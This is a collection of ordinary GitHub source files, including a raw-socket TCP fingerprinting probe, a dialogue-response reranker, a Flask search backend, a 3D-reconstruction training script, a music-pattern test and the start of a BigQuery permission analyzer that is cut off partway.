{"seq_id":"14742772238","text":"import socket\nimport time\nimport struct\nfrom probes.Probe import Probe\n\n\nclass TCPProbe(Probe):\n    def send(self, target_ip):\n        time.sleep(1)\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        s.bind((self.source_ip, self.source_port))\n        try:\n            s.connect((target_ip, self.target_port))\n        except socket.error as msg:\n            # print(\"Connection doesn't accept TCP connections on that port!\")\n            pass\n        s.close()\n\n    def receive(self):\n        try:\n            my_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))\n        except socket.error as msg:\n            pass\n            # return msg\n\n        has_ip_header = False\n\n        my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        my_socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n        my_socket.bind((self.interface, 0x0800))\n\n        while True:\n            packet = my_socket.recvfrom(100)\n            # Split the packet into the individual headers\n            ethernet_header = packet[0][0:14]\n            ip_header = packet[0][14:34]\n            tcp_header_default = packet[0][34:54]\n\n            # Unpack the raw bytes into strings\n            ethernet_information = struct.unpack('!6s6s1h',ethernet_header) # 0: Destination_mac, 1: Source_mac, 2: Type\n            ip_information = struct.unpack('!1s1s2s2s1s1s1s1s2s4s4s', ip_header)\n            tcp_information_default = struct.unpack('!2s2s4s4s1s1s1h2s2s', tcp_header_default)\n\n            # Read the information out of the strings\n            ip_address_source = socket.inet_ntoa(ip_information[9])\n            ip_address_destination = socket.inet_ntoa(ip_information[10])\n            ip_ttl = ord(ip_information[6]) # \"ord()\" converts the character value into an integer value (following the ASCII encoding)!\n            tcp_length_with_flags_bin_teil_1 = bin(ord(tcp_information_default[4]))[2:].zfill(8) # gives something like 0b1010000010100000 with 2*8=16 bits\n            tcp_length = tcp_length_with_flags_bin_teil_1[0:4]\n            tcp_length_with_flags_bin_teil_2 = bin(ord(tcp_information_default[5]))[2:].zfill(8)\n            tcp_window_size = int(tcp_information_default[6])\n            result = 0\n            if int(ethernet_information[2]) == 2048 and ip_address_source == self.target_ip:\n                # print(\"------------TCP-TEST-----------\"\n                #       \"\\nFrom \", ip_address_source,\n                #       \"\\n-ttl: \", ip_ttl,\n                #       \"\\n-tcp-len: \", int(tcp_length, 2) * 4,\n                #       \"\\n-tcp-flags \", tcp_length_with_flags_bin_teil_1[4:8] + tcp_length_with_flags_bin_teil_2,\n                #       \"\\n-window-size: \", tcp_window_size)\n                result = [ip_ttl, int(tcp_length, 2)*4, tcp_length_with_flags_bin_teil_1[4:8] + tcp_length_with_flags_bin_teil_2, tcp_window_size]\n                if int(tcp_length, 2) >= 10:\n                    print(\"\\nThe TCP-Header provides more information...\")\n                    tcp_header_option = packet[0][54:74]\n                    tcp_information_option = struct.unpack('!2s1H1B1s10s1?2s1B', tcp_header_option)\n                    tcp_mss = tcp_information_option[1]\n                    tcp_sack_permitted = tcp_information_option[2]\n                    tcp_no_operation = tcp_information_option[5]\n                    tcp_window_scale = tcp_information_option[7]\n                    # print(\n                    #     \"\\n-MSS: \", tcp_mss,\n                    #     \"\\n-SACK-Permitted: \", tcp_sack_permitted,\n                    #     \"\\n-NoOP: \", tcp_no_operation,\n                    #     \"\\n-Window scale: \", tcp_window_scale\n                    # )\n                    result.append([tcp_mss, tcp_sack_permitted, tcp_no_operation, tcp_window_scale])\n\n            return 
result\n","repo_name":"eliasarnold/internetandsecurityproject","sub_path":"src/probes/TCPProbe.py","file_name":"TCPProbe.py","file_ext":"py","file_size_in_byte":3900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40527896400","text":"import bert_score\nimport torch\nimport nltk\nimport numpy as np\nimport Levenshtein\nfrom baseline_modify.utils.metrics import (\n UnigramMetric, NGramDiversity,\n CorpusNGramDiversity,\n BLEU, METEOR, ROUGE\n)\nfrom scripts.dataset_walker import DatasetWalker\nfrom scripts.knowledge_reader import KnowledgeReader\nimport re\nimport os\n\nimport sys\nimport json\nimport argparse\nfrom collections import defaultdict\nfrom functools import partial\n\nRE_ART = re.compile(r'\\b(a|an|the)\\b')\nRE_PUNC = re.compile(r'[!\"#$%&()*+,-./:;<=>?@\\[\\]\\\\^`{|}~_\\']')\nPUNC = r'[!\"#$%&()*+,-./:;<=>?@\\[\\]\\\\^`{|}~_\\']'\n\nmetrics = [\n UnigramMetric(metric=\"recall\"),\n UnigramMetric(metric=\"precision\"),\n]\n\ndef splitSentence(paragraph):\n tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n sentences = tokenizer.tokenize(paragraph)\n return sentences\n\nclass Metric:\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.score_list = defaultdict(list)\n self.lm_score = []\n self.selection_r1 = []\n self.bertscore = []\n self.refs = []\n self.hyps = []\n\n def _recall_at_k(self, ref_knowledge, hyp_knowledge, k=5):\n relevance = self._match(ref_knowledge, hyp_knowledge)[:k]\n\n if True in relevance:\n result = 1\n else:\n result = 0\n\n return result\n\n def cal_bertscore(self):\n self.bertscore = bert_score.score(self.hyps, self.refs, lang=\"en\")\n\n def update(self, ref_text, hyp_text, lm_score):\n self.refs.append(ref_text.strip())\n self.hyps.append(hyp_text.strip())\n self.lm_score.append(lm_score)\n\n for metric in metrics:\n name = metric.name()\n metric.update((hyp_text, ref_text))\n self.score_list[name].append(metric.compute())\n metric.reset()\n\ndef get_response_and_score_meta(candidate, ver='old'):\n if ver == 'old':\n candidate_list = candidate.split('(')\n candidate_text = '('.join(candidate_list[:-1])\n lm_score = eval(candidate_list[-1][:-1])\n return candidate_text, lm_score\n else:\n return candidate['text'], candidate['score']\n\ndef set_response_and_score_meta(candidate, text, ver='old'):\n if ver == 'old':\n candidate_list = candidate.split('(')\n candidate_text = '('.join(candidate_list[:-1])\n lm_score = eval(candidate_list[-1][:-1])\n candidate = text + f'({lm_score})'\n else:\n candidate['text'] = text\n return candidate\n\ndef set_zeros_lm_score(lm_score, sub_beam_size, group_size):\n lm_score = lm_score.reshape(-1, group_size, sub_beam_size)\n lm_score *= (lm_score.max(dim=-1, keepdim=True)[0]==lm_score)\n lm_score = lm_score.reshape(-1, group_size * sub_beam_size)\n\ndef set_unless_lm(output, beam_size, lm_score, lm_zero, ver='old'):\n item_id = 0\n for pred in output:\n if pred['target']:\n for _id in range(beam_size):\n candidate = pred['beam_outputs'][f'id_{_id}']\n candidate_text, _ = get_response_and_score_meta(candidate, ver)\n if candidate_text[-1].isalnum():\n lm_score.view(-1)[item_id] = lm_zero\n item_id += 1\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Evaluate the system outputs.')\n\n parser.add_argument('--dataset', dest='dataset', action='store', metavar='DATASET', choices=['train', 'val', 'test'],\n required=True, help='The dataset to analyze')\n parser.add_argument('--dataroot', dest='dataroot', action='store', 
metavar='PATH', required=True,\n                        help='Will look for corpus in //...')\n    parser.add_argument(\"--knowledge_file\", type=str, default=\"knowledge.json\",\n                        help=\"knowledge file name.\")\n    parser.add_argument(\"--sub_beam_size\", type=int, default=2, help=\"sub_beam_size\")\n    parser.add_argument(\"--group_size\", type=int, default=4, help=\"group_size\")\n    parser.add_argument('--outfile', dest='outfile', action='store', metavar='JSON_FILE', required=True,\n                        help='File containing output JSON')\n    parser.add_argument('--get_response_version', type=str, default='new')\n    parser.add_argument('--from_combine', action='store_true')\n    parser.add_argument('--postfile', type=str, default='')\n    parser.add_argument('--version', type=str, default='', help='suffix for the rerank output file name')\n\n    args = parser.parse_args()\n\n    with open(args.outfile, 'r') as f:\n        output = json.load(f)\n    if args.from_combine:\n        postfile = args.postfile or re.sub(r'att_(\\d+)_(\\d+)', lambda m: f'att{m.group(2)}', args.outfile).replace('combine', 'post')\n        with open(postfile, 'r') as f:\n            post_output = json.load(f)\n\n    knowledge_reader = KnowledgeReader(dataroot=args.dataroot, knowledge_file=args.knowledge_file)\n    beam_size = args.sub_beam_size * args.group_size\n    version = args.version\n\n    get_response_and_score = partial(get_response_and_score_meta, ver=args.get_response_version)\n\n    med_radio_list = []\n    med_score_list = []\n    whole_knowledge_list = []\n\n    metric = Metric()\n    for pid, pred in enumerate(output):\n        if pred['target']:\n            front_txt = []\n            post_txt = []\n            lm_scores = []\n            ref_text = knowledge_reader.get_doc(**pred['knowledge'][0])['doc']['body']\n            whole_knowledge_list.append(ref_text)\n            p_response = pred['response']\n            p_response_list = splitSentence(p_response)\n            if len(p_response_list) > 1:\n                p_response_list = [' '.join(p_response_list[:i]) for i in range(1, len(p_response_list))]\n                p_response_list_med = [Levenshtein.distance(ref_text, candidate_text) for candidate_text in p_response_list]\n                p_response_front = p_response_list[int(np.argmin(p_response_list_med))]\n                p_response_post = p_response[len(p_response_front)+1:].strip()\n            for _id in range(beam_size):\n                candidate = pred['beam_outputs'][f'id_{_id}']\n                candidate_text, lm_score = get_response_and_score(candidate)\n                candidate_text_list = splitSentence(candidate_text)\n                if not args.from_combine:\n                    lm_scores.append(lm_score)\n                else:\n                    post_candidate = post_output[pid]['beam_outputs'][f'id_{_id}']\n                    _post_t, post_score = get_response_and_score(post_candidate)\n                    lm_scores.append(post_score)\n                if len(candidate_text_list) > 1:\n                    candidate_text_list = [' '.join(candidate_text_list[:i]) for i in range(1, len(candidate_text_list))]\n                    candidate_text_list_med = [Levenshtein.distance(ref_text, candidate_text) for candidate_text in candidate_text_list]\n                    candidate_text_after = candidate_text_list[int(np.argmin(candidate_text_list_med))]\n                    front_txt.append(candidate_text_after)\n                    if args.from_combine:\n                        post_txt.append(_post_t)\n                    else:\n                        post_txt.append(candidate_text[len(candidate_text_after)+1:].strip())\n                    candidate_text = candidate_text_after\n                else:\n                    front_txt.append(candidate_text)\n                    post_txt.append(candidate_text)\n                dis_func = Levenshtein.jaro_winkler\n                med_radio_list.append(dis_func(candidate_text, ref_text))\n                metric.update(ref_text, candidate_text, lm_score)\n\n    scores = metric.score_list\n\n    metric.cal_bertscore()\n    bert_score = metric.bertscore\n    lm_score = metric.lm_score\n\n    bert_score = bert_score[2].reshape((-1, beam_size))\n    lm_score = torch.tensor(lm_score).reshape((-1, beam_size))\n\n    med_radio_score = torch.tensor(med_radio_list).reshape((-1, 
beam_size))\n lm_score = (lm_score - lm_score.min())/(lm_score.max() - lm_score.min())\n set_zeros_lm_score(lm_score, args.sub_beam_size, args.group_size)\n bert_score -= bert_score.min(dim=-1, keepdim=True)[0]\n bert_score /= bert_score.max(dim=-1, keepdim=True)[0]\n med_part = torch.where(med_radio_score > 0.9, med_radio_score, torch.zeros_like(med_radio_score)) * 0.5\n final_score = bert_score + lm_score - med_part\n print(med_radio_score[0])\n print(bert_score[0], lm_score[0], med_part[0])\n\n select = final_score.argmax(dim=-1)\n\n item_id = 0\n for pred in output:\n if pred['target']:\n candidate_text, _ = get_response_and_score(pred['beam_outputs'][f'id_{select[item_id].item()}'])\n pred['response'] = candidate_text\n item_id += 1\n\n with open(os.path.join(args.outfile[:-5] + f'_rerank{version}.json'), 'w') as fout:\n json.dump(output, fout, indent=2)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"lxchtan/DSTC9-Track1","sub_path":"data_util/rerank_candidate.py","file_name":"rerank_candidate.py","file_ext":"py","file_size_in_byte":8111,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"9116169218","text":"#!/usr/bin/env python3\n\nfrom log2plot import Logger, Vec, copy\nimport os\nfrom numpy.random import randn\n\nlogger = Logger(os.path.dirname(__file__) + '/../')\n\n# v is an underlying std::vector that is the C++ object\nv = Vec(4)\nlogger.save(v, 'python', 'x_', 'x-value')\nlogger.setLineType('[C0, r.-, go, k--]')\n\nfor _ in range(100):\n\n actual_vector = randn(4)\n # we have to copy the values to v\n copy(actual_vector, v)\n\n logger.update()\n\nlogger.plot()\n","repo_name":"oKermorgant/log2plot","sub_path":"examples/src/from_python.py","file_name":"from_python.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"36243226700","text":"from flask import Flask, request, render_template, g\nfrom flask_cors import CORS\nimport os\nimport indexer\nimport wordvec\nimport xapian\nimport logging\nfrom time import time\n\nDATA = os.environ['DATA']\nMODEL = os.environ['WORD2VEC_MODEL']\n\ndef xapian_database():\n if 'db' not in g:\n path = os.path.join(DATA, 'xapian_index')\n g.db = xapian.Database(path)\n return g.db\n\ndef load_model():\n print(\"[Loading word2vec model]\")\n start = time()\n model = wordvec.load_model(MODEL)\n print(\"\\t loaded in %.2f seconds\" % (time() - start))\n return model\n\napp = Flask(__name__)\napp.logger.setLevel(logging.INFO)\ncors = CORS(app)\nword2vec_model = load_model()\n\n@app.route(\"/\")\ndef Index():\n return \"This is the search engine backend\"\n\n@app.route(\"/search\")\ndef Search():\n q = request.args.get('q', \"\").strip()\n expand = request.args.get('expand')\n offset = request.args.get('offset')\n limit = request.args.get('limit')\n prefix = request.args.get('prefix', 'S')\n\n try:\n offset = int(offset)\n except:\n offset = None\n\n try:\n limit = int(limit)\n except:\n limit = None\n\n if not q:\n return dict(error=\"Empty query\")\n else:\n if expand:\n expand_args = dict(model=word2vec_model, threshold=0.7)\n else:\n expand_args = None\n\n return indexer.query(xapian_database(), \n q, \n prefix,\n offset, limit, \n expand_args)\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=8998, 
debug=True)\n","repo_name":"RJMillerLab/opendata-keyword-search","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17805436877","text":"import torch\r\nimport numpy as np\r\nfrom dataset.dataset import getDatasetAndLoader\r\nfrom model import getOptNet\r\nfrom pyhocon import ConfigFactory,HOCONConverter\r\nimport argparse\r\nimport trimesh\r\nimport os\r\nimport os.path as osp\r\nfrom MCAcc import Seg3dLossless\r\nimport utils\r\nparser = argparse.ArgumentParser(description='neu video body rec')\r\nparser.add_argument('--gpu-ids',nargs='+',type=int,metavar='IDs',\r\n\t\t\t\t\thelp='gpu ids')\r\nparser.add_argument('--conf',default=None,metavar='M',\r\n\t\t\t\t\thelp='config file')\r\nparser.add_argument('--data',default=None,metavar='M',\r\n\t\t\t\t\thelp='data root')\r\nparser.add_argument('--model',default=None,metavar='M',\r\n\t\t\t\t\thelp='pretrained scene model')\r\nparser.add_argument('--model-rm-prefix',nargs='+',type=str,metavar='rm prefix', help='rm model prefix')\r\nparser.add_argument('--sdf-model',default=None,metavar='M',\r\n\t\t\t\t\thelp='substitute sdf model')\r\nparser.add_argument('--save-folder',default=None,metavar='M',help='save folder')\r\nargs = parser.parse_args()\r\n\r\n\r\n#point render\r\nresolutions={'coarse':\r\n[\r\n\t(14+1, 20+1, 8+1),\r\n\t(28+1, 40+1, 16+1),\r\n\t(56+1, 80+1, 32+1),\r\n\t(112+1, 160+1, 64+1),\r\n\t(224+1, 320+1, 128+1),\r\n],\r\n'medium':\r\n[\r\n\t(18+1, 24+1, 12+1),\r\n\t(36+1, 48+1, 24+1),\r\n\t(72+1, 96+1, 48+1),\r\n\t(144+1, 192+1, 96+1),\r\n\t(288+1, 384+1, 192+1),\r\n],\r\n'fine':\r\n[\r\n\t(20+1, 26+1, 14+1),\r\n\t(40+1, 52+1, 28+1),\r\n\t(80+1, 104+1, 56+1),\r\n\t(160+1, 208+1, 112+1),\r\n\t(320+1, 416+1, 224+1),\r\n]\r\n}\r\n\r\nresolutions_higher = [\r\n\t(32+1, 32+1, 32+1),\r\n\t(64+1, 64+1, 64+1),\r\n\t(128+1, 128+1, 128+1),\r\n\t(256+1, 256+1, 256+1),\r\n\t(512+1, 512+1, 512+1),\r\n]\r\n\r\n\r\n\r\nconfig=ConfigFactory.parse_file(args.conf)\r\nif len(args.gpu_ids):\r\n\tdevice=torch.device(args.gpu_ids[0])\r\nelse:\r\n\tdevice=torch.device(0)\r\ndata_root=args.data\r\nif args.save_folder is None:\r\n\tprint('please set save-folder...')\r\n\tassert(False)\r\n\r\nsave_root=osp.join(data_root,args.save_folder)\r\ndebug_root=osp.join(save_root,'debug')\r\nos.makedirs(save_root,exist_ok=True)\r\nos.makedirs(debug_root,exist_ok=True)\r\n# save the config file\r\nwith open(osp.join(save_root,'config.conf'),'w') as ff:\r\n\tff.write(HOCONConverter.convert(config,'hocon'))\r\ncondlen={'deformer':config.get_int('mlp_deformer.condlen'),'renderer':config.get_int('render_net.condlen')}\r\nbatch_size=config.get_int('train.coarse.point_render.batch_size')\r\ndataset,dataloader=getDatasetAndLoader(data_root,condlen,batch_size,\r\n\t\t\t\t\t\tconfig.get_bool('train.shuffle'),config.get_int('train.num_workers'),\r\n\t\t\t\t\t\tconfig.get_bool('train.opt_pose'),config.get_bool('train.opt_trans'),config.get_config('train.opt_camera'))\r\n\r\n# bmins=[-0.8,-1.25,-0.4]\r\n# bmaxs=[0.8,0.7,0.4]\r\n# use adaptive box computation\r\nbmins=None\r\nbmaxs=None\r\n\r\nif 
config.get_int('train.initial_iters')<=0:\r\n\tuse_initial_sdf=True\r\nelse:\r\n\tuse_initial_sdf=False\r\noptNet,sdf_initialized=getOptNet(dataset,batch_size,bmins,bmaxs,resolutions['coarse'],device,config,use_initial_sdf)\r\noptNet,dataloader=utils.set_hierarchical_config(config,'coarse',optNet,dataloader,resolutions['coarse'])\r\n\r\n\r\nif args.model is not None and osp.isfile(args.model):\r\n\tprint('load model: '+args.model,end='')\r\n\tif args.sdf_model is not None:\r\n\t\tprint(' and substitute sdf model with: '+args.sdf_model,end='')\r\n\t\tsdf_initialized=-1\r\n\tprint()\r\n\toptNet,dataset=utils.load_model(args.model,optNet,dataset,device,args.sdf_model,args.model_rm_prefix)\r\n\r\nprint('box:')\r\nprint(optNet.engine.b_min.view(-1).tolist())\r\nprint(optNet.engine.b_max.view(-1).tolist())\r\noptNet.train()\r\n\r\nif sdf_initialized>0:\r\n\toptNet.initializeTmpSDF(sdf_initialized,osp.join(data_root,'initial_sdf_idr'+'_%d_%d.pth'%(config.get_int('sdf_net.multires'),config.get_int('train.skinner_pose_type'))),True)\r\n\tengine = Seg3dLossless(\r\n\t\t\tquery_func=None, \r\n\t\t\tb_min = optNet.engine.b_min,\r\n\t\t\tb_max = optNet.engine.b_max,\r\n\t\t\tresolutions=resolutions['coarse'],\r\n\t\t\talign_corners=False,\r\n\t\t\tbalance_value=0.0, # be careful\r\n\t\t\tvisualize=False,\r\n\t\t\tdebug=False,\r\n\t\t\tuse_cuda_impl=False,\r\n\t\t\tfaster=False \r\n\t\t).to(device)\r\n\tverts,faces=optNet.discretizeSDF(-1,engine)\r\n\tmesh = trimesh.Trimesh(verts.cpu().numpy(), faces.cpu().numpy())\r\n\r\n\tmesh.export(osp.join(data_root,'initial_sdf_idr'+'_%d_%d.ply'%(config.get_int('sdf_net.multires'),config.get_int('train.skinner_pose_type'))))\r\n\r\n\r\nlearnable_ws=dataset.learnable_weights()\r\n\r\n\r\n\r\noptimizer = torch.optim.Adam([{'params':learnable_ws},{'params':[p for p in optNet.parameters() if p.requires_grad]}], lr=config.get_float('train.learning_rate'))\r\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, config.get_list('train.scheduler.milestones'), gamma=config.get_float('train.scheduler.factor'))\r\n\r\nratio={'sdfRatio':None,'deformerRatio':None,'renderRatio':None}\r\nopt_times=0.\r\nnepochs=config.get_int('train.nepoch')\r\nsample_pix_num=config.get_int('train.sample_pix_num')\r\nin_fine_hie=False\r\nfor epoch in range(0,nepochs+1):\t\r\n\tif config.get_int('train.medium.start_epoch')>=0 and epoch==config.get_int('train.medium.start_epoch'):\r\n\t\toptNet,dataloader=utils.set_hierarchical_config(config,'medium',optNet,dataloader,resolutions['medium'])\r\n\t\ttorch.cuda.empty_cache()\r\n\t\tprint('enable medium hierarchical')\r\n\t\tutils.save_model(osp.join(save_root,\"coarse.pth\"),epoch,optNet,dataset)\r\n\tif config.get_int('train.fine.start_epoch')>=0 and epoch==config.get_int('train.fine.start_epoch'):\r\n\t\toptNet,dataloader=utils.set_hierarchical_config(config,'fine',optNet,dataloader,resolutions['fine'])\r\n\t\tprint('enable fine hierarchical')\r\n\t\ttorch.cuda.empty_cache()\r\n\t\tutils.save_model(osp.join(save_root,\"medium.pth\"),epoch,optNet,dataset)\r\n\t\tin_fine_hie=True\r\n\t# for data_index, (frame_ids, imgs, masks, albedos) in enumerate(dataloader):\r\n\tfor data_index, (frame_ids, outs) in 
enumerate(dataloader):\r\n\t\tframe_ids=frame_ids.long().to(device)\r\n\t\toptimizer.zero_grad()\r\n\r\n\t\tratio['sdfRatio']=1.\r\n\t\tratio['deformerRatio']=opt_times/2500.+0.5\r\n\t\tratio['renderRatio']=1.\r\n\t\tloss=optNet(outs,sample_pix_num,ratio,frame_ids,debug_root)\t\t\r\n\t\tloss.backward()\t\r\n\t\toptNet.propagateTmpPsGrad(frame_ids,ratio)\r\n\t\toptimizer.step()\r\n\t\tif data_index%1==0:\r\n\t\t\toutinfo='(%d/%d): loss = %.5f; color_loss: %.5f, eikonal_loss: %.5f'%(epoch,data_index,loss.item(),optNet.info['color_loss'],optNet.info['grad_loss'])+ \\\r\n\t\t\t\t\t(' normal_loss: %.5f,'%optNet.info['normal_loss'] if 'normal_loss' in optNet.info else '')+ \\\r\n\t\t\t\t\t(' def_loss: %.5f,'%optNet.info['def_loss'] if 'def_loss' in optNet.info else '')+ \\\r\n\t\t\t\t\t(' offset_loss: %.5f,'%optNet.info['offset_loss'] if 'offset_loss' in optNet.info else '')+ \\\r\n\t\t\t\t\t(' dct_loss: %.5f,'%optNet.info['dct_loss'] if 'dct_loss' in optNet.info else '')\r\n\t\t\toutinfo+='\\n'\r\n\t\t\toutinfo+='\\tpc_sdf_l: %.5f'%(optNet.info['pc_loss_sdf'])\r\n\t\t\toutinfo+=';\\tpc_norm_l: %.5f; '%(optNet.info['pc_loss_norm']) if 'pc_loss_norm' in optNet.info else '; '\r\n\t\t\tfor k,v in optNet.info['pc_loss'].items():\r\n\t\t\t\toutinfo+=k+': %.5f\\t'%v\r\n\t\t\toutinfo+='\\n\\trayInfo(%d,%d)\\tinvInfo(%d,%d)\\tratio: (%.2f,%.2f,%.2f)\\tremesh: %.3f'%(*optNet.info['rayInfo'],*optNet.info['invInfo'],ratio['sdfRatio'],ratio['deformerRatio'],ratio['renderRatio'],optNet.info['remesh'])\r\n\t\t\tprint(outinfo)\r\n\r\n\t\topt_times+=1.\r\n\tif in_fine_hie:\r\n\t\toptNet.draw=True\r\n\tutils.save_model(osp.join(save_root,\"latest.pth\"),epoch,optNet,dataset)\r\n\tscheduler.step()","repo_name":"jby1993/SelfReconCode","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"en","doc_type":"code","stars":381,"dataset":"github-code","pt":"53"} +{"seq_id":"72994721769","text":"import pytest\n\nfrom supriya.patterns import EventPattern, NoteEvent, SequencePattern, UpdatePattern\nfrom supriya.patterns.testutils import MockUUID as M\nfrom supriya.patterns.testutils import run_pattern_test\n\n\n@pytest.mark.parametrize(\n \"stop_at, input_a, input_b1, input_b2, input_c, expected, is_infinite\",\n [\n (\n None,\n SequencePattern([1, 2, 3]),\n SequencePattern([4, 5]),\n SequencePattern([7, 8, 9]),\n SequencePattern([10, 11]),\n [NoteEvent(M(\"A\"), a=1, b=7, c=10), NoteEvent(M(\"B\"), a=2, b=8, c=11)],\n False,\n ),\n (\n None,\n SequencePattern([1, 2, 3], None),\n SequencePattern([4, 5], None),\n SequencePattern([7, 8, 9]),\n SequencePattern([10, 11]),\n [NoteEvent(M(\"A\"), a=1, b=7, c=10), NoteEvent(M(\"B\"), a=2, b=8, c=11)],\n False,\n ),\n (\n None,\n SequencePattern([1, 2, 3], None),\n SequencePattern([4, 5], None),\n SequencePattern([7, 8, 9], None),\n SequencePattern([10, 11], None),\n [\n NoteEvent(M(\"A\"), a=1, b=7, c=10),\n NoteEvent(M(\"B\"), a=2, b=8, c=11),\n NoteEvent(M(\"C\"), a=3, b=9, c=10),\n NoteEvent(M(\"D\"), a=1, b=7, c=11),\n NoteEvent(M(\"E\"), a=2, b=8, c=10),\n NoteEvent(M(\"F\"), a=3, b=9, c=11),\n ],\n True,\n ),\n ],\n)\ndef test(stop_at, input_a, input_b1, input_b2, input_c, expected, is_infinite):\n pattern = UpdatePattern(EventPattern(a=input_a, b=input_b1), b=input_b2, c=input_c)\n run_pattern_test(pattern, expected, is_infinite, 
stop_at)\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"tests/patterns/test_UpdatePattern.py","file_name":"test_UpdatePattern.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"}
{"seq_id":"24675341693","text":"\"\"\"This analyzer uses data from BigQuery and GCP IAM to list all possible permissions to BigQuery tables/views.\n\nBigQuery authorization is based on GCP IAM.\nWith IAM, you manage access control by defining who (identity) has what access (role) for which resource.\nIn IAM, permission to access a resource isn't granted directly to the end user.\nInstead, permissions are grouped into roles, and roles are granted to authenticated principals.\nThis model for access management has three main parts:\n\nPrincipal:\nA principal can be a Google Account (for end users).\nA service account (for applications and compute workloads).\nA Google group.\nA Google Workspace account or Cloud Identity domain that can access a resource.\nEach principal has its own identifier, which is typically an email address.\n\nRole:\nA role is a collection of permissions.\nPermissions determine what operations are allowed on a resource.\nWhen you grant a role to a principal, you grant all the permissions that the role contains.\n\nPolicy:\nThe allow policy is a collection of role bindings that bind one or more principals to individual roles.\nWhen you want to define who (principal) has what type of access (role) on a resource,\nyou create an allow policy and attach it to the resource.\n\nYou can grant access to a project.\nMost services support IAM permissions at a finer granularity,\nsuch as access to a specific storage bucket.\n\nThere are several kinds of roles in IAM:\nBasic roles: Roles historically available in the Google Cloud console. These roles are Owner, Editor, and Viewer.\nPredefined roles\nCustom roles\n\nResource hierarchy\n\nThe organization is the root node in the hierarchy.\nFolders are children of the organization.\nProjects are children of the organization, or of a folder.\nResources for each service are descendants of projects.\n\nResources inherit the allow policies of all of their parent resources.\n\nThe canonical structure of the authorization graph is as follows:\nTable - may have permissions defined directly on it and inherits the permissions from the dataset.\nDataset - may have permissions defined directly on it and potentially inherits some permissions from the project.\nProject - may have permissions defined directly on it and inherits the permissions from the folder it's contained in.\nFolder - may have permissions defined directly on it and inherits the permissions from its parent folder(s) or organization.\nOrganization - may have permissions defined directly on it.\nPermissions are defined using roles; see the mapping of roles to permissions in the policy_tree module.\n\"\"\"\n\nimport json\nfrom dataclasses import dataclass\nfrom logging import Logger\nfrom pathlib import Path\nfrom typing import Any, List, Optional, Union\n\nfrom google.api_core.page_iterator import Iterator # type: ignore\nfrom google.cloud.bigquery.table import TableListItem # type: ignore\nfrom google.oauth2.service_account import Credentials # type: ignore\n\nfrom universal_data_permissions_scanner.datastores.bigquery.policy_tree import (\n    GRANTED_BY_TO_PATHZ_ELEMENT,\n    READ_PERMISSIONS,\n    WRITE_PERMISSIONS,\n    CustomPermission,\n    DatasetPolicyNode,\n    Member,\n    PolicyNode,\n    TableIamPolicyNode,\n)\nfrom universal_data_permissions_scanner.datastores.bigquery.service import BigQueryService\nfrom universal_data_permissions_scanner.models.model import (\n    Asset,\n    AssetType,\n    AuthzEntry,\n    AuthzNote,\n    AuthzPathElement,\n    AuthzPathElementType,\n    Identity,\n    PermissionLevel,\n)\nfrom universal_data_permissions_scanner.utils.logger import get_logger\nfrom universal_data_permissions_scanner.writers import BaseWriter\nfrom universal_data_permissions_scanner.writers.base_writers import DEFAULT_OUTPUT_FILE, OutputFormat\nfrom universal_data_permissions_scanner.writers.get_writers import get_writer\n\n\n@dataclass\nclass BigQueryAuthzAnalyzer:\n    \"\"\"BigQuery authorization analyzer.\"\"\"\n\n    logger: Logger\n    service: BigQueryService\n    writer: BaseWriter\n\n    @classmethod\n    def connect(\n        cls,\n        project_id: str,\n        logger: Optional[Logger] = None,\n        output_format: OutputFormat = OutputFormat.CSV,\n        output_path: Union[Path, str] = Path.cwd() / DEFAULT_OUTPUT_FILE,\n        credentials_str: Optional[str] = None,\n        **kwargs: Any,\n    ):\n        \"\"\"Connect to BigQuery and return an instance of the analyzer.\n\n        Args:\n            project_id (str): GCP project id to analyze.\n            logger (Optional[Logger], optional): Python logger. Defaults to None.\n            output_format (OutputFormat, optional): file format to export. Defaults to OutputFormat.CSV.\n            output_path (Union[Path, str], optional): Path to write the file. Defaults to ./authz-analyzer-export.\n            credentials_str (Optional[str], optional): ServiceAccount to connect to BigQuery. 
Defaults to None.\n \"\"\"\n writer = get_writer(filename=output_path, output_format=output_format)\n if logger is None:\n logger = get_logger(False)\n if credentials_str is not None:\n credentials = Credentials.from_service_account_info(json.loads(credentials_str)) # type: ignore\n big_query_service = BigQueryService.load(project_id, credentials=credentials, **kwargs)\n else:\n big_query_service = BigQueryService.load(project_id, **kwargs)\n return cls(logger, big_query_service, writer=writer)\n\n def run(self) -> None:\n \"\"\"Read all tables in all datasets and calculate authz paths\"\"\"\n self.logger.info(\"Starting BigQuery authorization analysis for project %s\", self.service.project_id)\n project_node = self.service.lookup_project(self._resolve_custom_role_to_permissions)\n for dataset_id in self.service.list_datasets():\n self.logger.info(\"Scanning dataset %s\", dataset_id)\n dataset = self.service.get_dataset(dataset_id)\n dataset_node = DatasetPolicyNode(dataset, self._resolve_custom_role_to_permissions)\n dataset_node.set_parent(project_node)\n tables: Iterator = self.service.list_tables(dataset_id)\n table: TableListItem\n for table in tables:\n fq_table_id = f\"{table.project}.{table.dataset_id}.{table.table_id}\" # type: ignore\n 